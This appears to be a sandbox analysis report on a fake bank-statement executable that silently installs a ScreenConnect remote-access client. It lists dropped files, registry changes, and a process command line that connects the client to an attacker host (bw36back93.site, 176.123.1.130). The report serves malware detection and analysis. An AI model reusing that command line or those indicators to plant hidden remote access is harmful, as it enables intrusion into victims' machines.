Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
2024-11 eStmt 5563019.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsCredentialProvider.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2024-11 eStmt 5563019.exe.log
|
CSV text
|
dropped
|
|
|
|
C:\Config.Msi\6153c6.rbs
|
data
|
modified
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\Client.Override.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\Client.Override.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\Client.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\Client.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\app.config
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\system.config
|
XML 1.0 document, ASCII text, with very long lines (457), with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\web.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
|
CSV text
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4E28.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\CustomAction.config
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\Microsoft.Deployment.WindowsInstaller.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.InstallerActions.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI4E28.tmp-\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ScreenConnect\d519fd2fdcfe66e7\setup.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {2AB23E87-2E48-F825-88EA-423B8FFA6658}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb
21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\6153c5.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {2AB23E87-2E48-F825-88EA-423B8FFA6658}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb
21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\6153c7.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {2AB23E87-2E48-F825-88EA-423B8FFA6658}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb
21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\MSI5684.tmp
|
data
|
dropped
|
||
|
C:\Windows\Installer\MSI56A4.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\MSI586B.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\SourceHash{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\{2AB23E87-2E48-F825-88EA-423B8FFA6658}\DefaultIcon
|
MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32
with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
|
dropped
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d519fd2fdcfe66e7)\cq3gckld.newcfg
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d519fd2fdcfe66e7)\user.config (copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\Temp\~DF260B7C0AD6560520.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF347EF5B835911DB3.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF39BBAB0D6029F1BF.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF5413CFF814B5EAEA.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF5E87458ECF3A60B5.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF763AFB16DDB1CC44.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF7DE1DAD4D0BC90D3.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF92DEB81E91E6D665.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF9A120E8F8B35055A.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFB139E8C09898B032.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFCDD8A8F7776C3D83.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFE48180DA32B6B466.TMP
|
data
|
dropped
|
There are 44 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\2024-11 eStmt 5563019.exe
|
"C:\Users\user\Desktop\2024-11 eStmt 5563019.exe"
|
|
|
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe
|
"C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bw36back93.site&p=8880&s=e250a80a-96da-47fd-91f2-1c092bc9b1b7&k=BgIAAACkAABSU0ExAAgAAAEAAQBVrCWSt%2b2cKthNAS8WCpzwBkW7gylKQJ6RDxIjHv%2fRvikga3OHVBUUk74eX5u2WDvyGlxXUsTAHstE3Rks8Zw%2f5nMdMDz%2ffz%2fdADWqNvA27WRDTbgEuKYVImg%2bRuQTeYBssAlSkC71PJ4gqNaRdbnySWnXqNuCohB8XKd6MUQapUfc4DXF0e7EWF1onYtP%2bZz6ui1%2fvm3P0miTphdoOYDPJyJmnFL6AS3%2bEi4fXJkHoPDDjsiShDMOBGrn%2bwsLLVTQZCpIQElO7sxadYkptz0t1JF7bRKqG2Z6vshgz%2fal71%2fFvdI1kgsL2h5jLyMZgmq6EW%2fOzhQCdP4oY8SDbMW0&c=SV&c=11-11%20NEWP&c=&c=&c=&c=&c=&c="
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "be299499-1fb7-4c2b-ae20-2cc88daa91a5"
"User"
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\ScreenConnect.WindowsClient.exe" "RunRole" "8321ee3f-595b-4e66-bca9-df29533298fb"
"System"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\d519fd2fdcfe66e7\setup.msi"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 4AED0F1D3607922BE2F1EC6832F9BAE3 C
|
||
|
C:\Windows\SysWOW64\rundll32.exe
|
rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI4E28.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6377093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding A5BF5D09ED87785AFA67BD755C799625
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 68F89B22406E06E7C28E4AD1705B01FD E Global\MSI0000
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://wixtoolset.org/releases/
|
unknown
|
||
|
http://wixtoolset.org/news/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
|
unknown
|
||
|
https://feedback.screenconnect.com/Feedback.axd
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bw36back93.site
|
176.123.1.130
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
176.123.1.130
|
bw36back93.site
|
Moldova Republic of
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Config.Msi\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\6153c6.rbs
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\6153c6.rbsLow
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FA00451A4510135830AA93468CDA054B
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EA9AB5F809CC12FE4DF4D0EBF15861E7
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\58D550506E9CB6F4450DBEA30E1DF207
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C2616FD9E296BA1B5F9C3E6E2D74485B
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7F562F959E0EB5936CDB77B7E55B87C1
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BED598E88A52528A87EC2D1144F0F513
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Program Files (x86)\ScreenConnect Client (d519fd2fdcfe66e7)\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-d519fd2fdcfe66e7
|
URL Protocol
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-d519fd2fdcfe66e7
|
UseOriginalUrlEncoding
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-d519fd2fdcfe66e7\shell\open\command
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (d519fd2fdcfe66e7)
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-4DC3-7ACEBCD60FE9}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-4DC3-7ACEBCD60FE9}\InprocServer32
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-4DC3-7ACEBCD60FE9}\InprocServer32
|
ThreadingModel
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-4DC3-7ACEBCD60FE9}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
LocalPackage
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\F667DD9887E472335D91DFF2CDEF667E
|
78E32BA284E2528F88AE24B3F8AF6685
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\InstallProperties
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{2AB23E87-2E48-F825-88EA-423B8FFA6658}
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\78E32BA284E2528F88AE24B3F8AF6685
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\Features
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Windows\Installer\{2AB23E87-2E48-F825-88EA-423B8FFA6658}\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\78E32BA284E2528F88AE24B3F8AF6685\Patches
|
AllPatches
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
ProductName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
PackageCode
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
Assignment
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\78E32BA284E2528F88AE24B3F8AF6685
|
AdvertiseFlags
|
||
|
